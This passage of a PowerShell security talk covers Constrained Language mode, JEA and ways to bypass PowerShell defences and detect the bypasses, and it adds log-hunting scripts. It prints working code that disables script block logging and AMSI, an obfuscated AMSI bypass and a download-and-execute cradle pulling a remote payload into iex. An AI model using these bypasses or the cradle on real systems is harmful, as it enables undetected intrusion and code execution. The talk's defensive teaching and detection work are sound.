▪ In the constrained language mode, all Windows cmdlets and elements are allowed but only a limited set of types is allowed. For example, Add-Type, Win32 APIs and COM objects are not allowed.
▪ Intended to work with AppLocker in Allow mode or UMCI (Device Guard User Mode Code Integrity). When Allow mode is set for scripts in AppLocker, the Constrained Language mode kicks in by itself.
▪ Known problem: Not easy to implement enterprise-wide as it may break many legitimate scripts.
24. PowerShell ♥ the Blue Team - Constrained PowerShell
25. PowerShell ♥ the Blue Team - JEA
▪ JEA (Just Enough Administration) provides role based access control for PowerShell based remote delegated administration.
▪ With JEA non-admin users can connect remotely to machines for doing specific tasks.
▪ Unlike the others discussed so far, JEA is focused more on securing privileged access than on solving a problem introduced with PowerShell.
▪ JEA endpoints have PowerShell transcription and logging enabled.
Reference: https://msdn.microsoft.com/en-us/library/dn896648.aspx
26. DEMO - Did we leave fingerprints?
27. Same Attack Simulation without PowerShell
▪ Initial Compromise - VBA, VBScript and JScript payloads.
– Metasploit and a ton of other tools
▪ Active Directory enumeration
– WMI, VBScript
▪ Domain Privilege Escalation
– Mimikatz in JS using DotNetToJScript
– Packed and obfuscated mimikatz.exe
▪ From the defenses discussed, only AMSI will interfere with the execution of the scripts.
28. How does PowerShell fare in comparison to other shell and scripting languages?
From: https://blogs.msdn.microsoft.com/powershell/2017/04/10/a-comparison-of-shell-and-scripting-language-security/
29. No more PowerShell Red Teaming?
▪ Does all this mean that PowerShell is not good for red teaming anymore?
▪ PowerShell still provides a very useful ability for lateral movement and script execution. At least as long as the security controls are not deployed and managed in enterprises.
▪ Also, there is a very smart PowerShell tooling community creating top notch tools useful for both Red and Blue Teams.
30. Bypassing the Defenses and Detecting the Bypasses
▪ Bypasses for the defenses can be grouped into the following categories:
– PowerShell downgrade to version 2
– Unloading, disabling or unsubscribing
– Obfuscation
– Trust abuse (Using trusted executables and code injection in trusted scripts)
▪ Many bypasses leave log entries which can be used to detect them.
31. Bypassing the defenses - PowerShell Downgrade
▪ PowerShell version 2 lacks ALL of the detection mechanisms we discussed.
▪ PowerShell version 2 can be called using the -Version parameter or by using v2 reference assemblies.
▪ Version 2.0, 3.0 or 3.5 of the .NET Framework is required to use PowerShell v2.
▪ The PowerShell v2 Windows feature must be enabled (enabled by default).
32. Detecting the Bypass - PowerShell Downgrade
▪ The "Windows PowerShell" log can be used to detect the downgrade bypass. The Event ID 400 (Engine Lifecycle) logs the "HostVersion" as 2.0.
▪ Device Guard or AppLocker can be used to block older versions of PowerShell.
http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
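A hunt for the downgrade based on slide 32, as an added example that is not part of the deck: it reads Event ID 400 from the classic Windows PowerShell log and extracts the HostVersion and EngineVersion fields from the message text. The field layout of the 400 message is assumed from Windows PowerShell 5.1.

```powershell
# Added example (not from the slides): find PowerShell v2 engine starts.
# Event ID 400 (Engine Lifecycle) in the "Windows PowerShell" log carries lines
# such as "HostName=ConsoleHost", "HostVersion=2.0" and "EngineVersion=2.0" in its message.

function Find-PSDowngrade {
    [CmdletBinding()]
    param(
        # Look-back window; default one day.
        [datetime]$Since = (Get-Date).AddDays(-1)
    )

    $filter = @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = $Since }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $msg = $_.Message
            # Pull the fields out of the message body; "unknown" if a field is missing.
            $hostVer   = if ($msg -match 'HostVersion=([\d.]+)')   { $Matches[1] } else { 'unknown' }
            $engineVer = if ($msg -match 'EngineVersion=([\d.]+)') { $Matches[1] } else { 'unknown' }
            $hostName  = if ($msg -match 'HostName=([^\r\n]+)')    { $Matches[1].Trim() } else { 'unknown' }
            [pscustomobject]@{
                TimeCreated   = $_.TimeCreated
                Computer      = $_.MachineName
                HostName      = $hostName
                HostVersion   = $hostVer
                EngineVersion = $engineVer
            }
        } |
        # On a host that has v5.1 installed, a 2.x engine or host is the downgrade (slide 32).
        Where-Object { $_.EngineVersion -like '2.*' -or $_.HostVersion -like '2.*' }
}

# Example run: everything from the last week, newest first.
Find-PSDowngrade -Since (Get-Date).AddDays(-7) |
    Sort-Object TimeCreated -Descending |
    Format-Table -AutoSize
```

Because the v2 engine writes nothing to the newer Operational log, this classic log is the only place the event leaves a trace, which is why the slide pairs the detection with blocking v2 through AppLocker or Device Guard.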
33. Bypassing the defenses - Unloading Script Block Logging
▪ Script block logging can be bypassed for the current session without admin rights by disabling it from the Group Policy cache, as discovered by Ryan Cobb.
▪ For efficiency, Group Policy settings are cached and used by PowerShell. It is possible to read and modify the settings!
Taken From: https://cobbr.io/ScriptBlock-Logging-Bypass.html
# From the cobbr.io post referenced above: reads the engine's cached Group Policy
# settings through reflection and flips the ScriptBlockLogging entries for this process only.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }
    $val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
    $val.Add('EnableScriptB'+'lockLogging', 0)
    $val.Add('EnableScriptB'+'lockInvocationLogging', 0)
    $GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://myserver/mypayload.ps1")
34. Bypassing the defenses - Unloading Warning Level Script Block Logging
▪ Recall that the Warning level script block logging (which is enabled by default) uses a list of known bad words.
▪ Turns out the logging can be bypassed for the current session without admin rights by setting the list (the signatures field in the ScriptBlock class) to null. Once again, discovered by Ryan Cobb.
Taken From: https://cobbr.io/ScriptBlock-Warning-Event-Logging-Bypass.html
# The bypass: replaces the static "signatures" list with an empty set for this process
[ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
# To use a base64 encoded payload script with the bypass
[ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]));[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IgA8AE0AeQAgAHMAdQBzAHAAaQBjAGkAbwB1AHMAIABOAG8AbgBQAHUAYgBsAGkAYwAgAHAAYQB5AGwAbwBhAGQAPgAiAA=='))|iex
35. Detecting the bypass - Unloading Script Block Logging
▪ Both the bypasses are logged unless obfuscated.
▪ The script block logging bypass evades detection if used from a download cradle.
36. Bypassing the defenses - Disabling AMSI
▪ AMSI can be bypassed for the current session without admin rights by setting the amsiInitFailed field of System.Management.Automation.AmsiUtils to true, as tweeted by Matt Graeber:
https://twitter.com/mattifestation/status/735261176745988096
# Use s_amsiInitFailed for PowerShell v6.
# Bypass one - marked as malicious by some AntiVirus. Use with obfuscation.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Bypass two - not detected by auto logging (same field, reached through a delegate so the
# known-bad strings never appear whole in the script block)
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
37. Detecting the bypasses - AMSI
▪ Warning level script block auto logging detects the first bypass.
38. Bypassing the Defenses - Obfuscation
▪ Obfuscation defeats script block logging, warning level auto logging
and AMSI when done right.
▪ As a very simple example, we have already seen how GetField
becomes GetFiel`d to bypass warning level auto logging.
▪ Invoke-Obfuscation and Invoke-CradleCrafter from Daniel
(https://github.com/danielbohannon) are very useful for
implementing obfuscation.
39. Detecting the bypasses - Obfuscation
▪ Obfuscated scripts can be spotted by comparing common characteristics like variable names, function names, character frequency, distribution of language operators, entropy etc.
▪ Revoke-Obfuscation (https://github.com/danielbohannon/Revoke-Obfuscation) is one such tool for identifying obfuscated scripts from event logs.
▪ Bonus: To avoid detection of obfuscation we can use minimal obfuscation by identifying the exact signature which gets detected and obfuscating only that part of the script. See: https://cobbr.io/PSAmsi-Minimizing-Obfuscation-To-Maximize-Stealth.html
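As an added example (not from the deck or from Revoke-Obfuscation), the following scores 4104 script blocks on the characteristics listed on slide 39 and also flags Warning-level entries (slides 35 and 37) and the field names reached for by the bypasses on slides 33 to 36. The weights and threshold are illustrative assumptions to be tuned against your own baseline, and the two sample strings are constructed.

```powershell
# Added example (not from the slides): hunt over Event ID 4104 in
# Microsoft-Windows-PowerShell/Operational for obfuscation and known bypass field names.

function Get-ScriptBlockEntropy {
    param([string]$Text)
    if (-not $Text) { return 0.0 }
    $counts = @{}
    foreach ($ch in $Text.ToCharArray()) { $counts[$ch] = 1 + [int]$counts[$ch] }
    $len = $Text.Length
    $h = 0.0
    foreach ($n in $counts.Values) {
        $p = $n / $len
        $h -= $p * [math]::Log($p, 2)   # Shannon entropy in bits per character
    }
    return [math]::Round($h, 3)
}

function Get-ObfuscationScore {
    param([string]$Text)
    $len = [math]::Max($Text.Length, 1)
    # Ratios of constructs that are rare in hand-written scripts but pile up in obfuscated ones.
    $backticks = ([regex]::Matches($Text, '`')).Count / $len              # GetFiel`d style escapes
    $concats   = ([regex]::Matches($Text, "'\s*\+\s*'")).Count / $len     # 'GetFie'+'ld' style splitting
    $specials  = ([regex]::Matches($Text, '[^\w\s]')).Count / $len        # operator / punctuation density
    $entropy   = Get-ScriptBlockEntropy -Text $Text
    # Weights are an assumption for illustration; tune them against your own 4104 baseline.
    $score = 2000 * $backticks + 2000 * $concats + 50 * $specials + 10 * [math]::Max($entropy - 4.5, 0)
    [pscustomobject]@{
        Length        = $Text.Length
        Entropy       = $entropy
        BacktickRatio = [math]::Round($backticks, 4)
        ConcatRatio   = [math]::Round($concats, 4)
        SpecialRatio  = [math]::Round($specials, 4)
        Score         = [math]::Round($score, 2)
    }
}

# Field and type names the bypasses on slides 33-36 reach for. Script block logging records the
# de-obfuscated form too (slide 16), so these can surface even when the auto logging was silenced.
$BypassIndicators = @('cachedGroupPolicySettings', 'amsiInitFailed', 's_amsiInitFailed', 'AmsiUtils')

function Find-SuspiciousScriptBlocks {
    param([datetime]$Since = (Get-Date).AddDays(-1), [double]$MinScore = 15)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Properties[2] is ScriptBlockText and Properties[3] the ScriptBlockId of a 4104 event.
        $text  = [string]$_.Properties[2].Value
        $stats = Get-ObfuscationScore -Text $text
        $hits  = @($BypassIndicators | Where-Object { $text -match [regex]::Escape($_) })
        # Level 3 is Warning, i.e. the engine's own "suspicious command" auto logging fired.
        if ($_.Level -eq 3 -or $hits.Count -gt 0 -or $stats.Score -ge $MinScore) {
            [pscustomobject]@{
                TimeCreated   = $_.TimeCreated
                ScriptBlockId = $_.Properties[3].Value
                WarningLevel  = ($_.Level -eq 3)
                Indicators    = ($hits -join ',')
                Score         = $stats.Score
                Entropy       = $stats.Entropy
                Preview       = ($text.Substring(0, [math]::Min(80, $text.Length)) -replace '\s+', ' ')
            }
        }
    }
}

# Constructed samples so the scorer can be tried offline: a plain one-liner and the same
# command rewritten with the string splitting and backtick tricks described on slide 38.
$plain = 'Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name, Id'
$obfuscated = @'
&('Ge'+'t-Pr'+'oc'+'ess') | .('Whe'+'re-Ob'+'ject') { $_.C`PU -gt 100 } | .('Sel'+'ect-Ob'+'ject') Name, Id
'@
Get-ObfuscationScore -Text $plain        # low score: no backticks, no concatenation
Get-ObfuscationScore -Text $obfuscated   # high score: concatenation and backtick ratios dominate
Find-SuspiciousScriptBlocks -Since (Get-Date).AddDays(-7) | Format-Table -AutoSize
```

Keep the slide's bonus point in mind when reading the scores: minimal obfuscation of just the detected signature leaves the ratios close to a clean script, so the indicator and Warning-level checks matter as much as the score.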
40. Bypassing the defenses - PowerShell Upgrade (!!?)
▪ PowerShell v6.0.0 (pwsh.exe) has only two of the discussed security features: Warning level script block logging (not automatic) and AMSI (the bypasses still work).
▪ This is probably because it is not Windows PowerShell but PowerShell Core.
▪ The warning level script block logging needs to be set up by running a PowerShell script, RegisterManifest.ps1, which registers the PowerShellCore event provider.
http://www.labofapenetrationtester.com/2018/01/powershell6.html
41. Bypassing the defenses - PowerShell Upgrade (!!?)
42. Conclusion
▪ The security controls, as we saw, can be bypassed, but they truly increase the cost to an adversary. And this makes the security controls good enough to be implemented.
▪ All the security controls are built-in, free and do not need specialized knowledge or set up time.
▪ Not over for red teamers - PowerShell is a tool for true Purple Teaming!
43. Thank You
▪ Please leave feedback.
▪ Follow me @nikhil_mitt
▪ For questions, training, assessments -
nikhil.uitrgpv@gmail.com
nikhil@pentesteracademy.com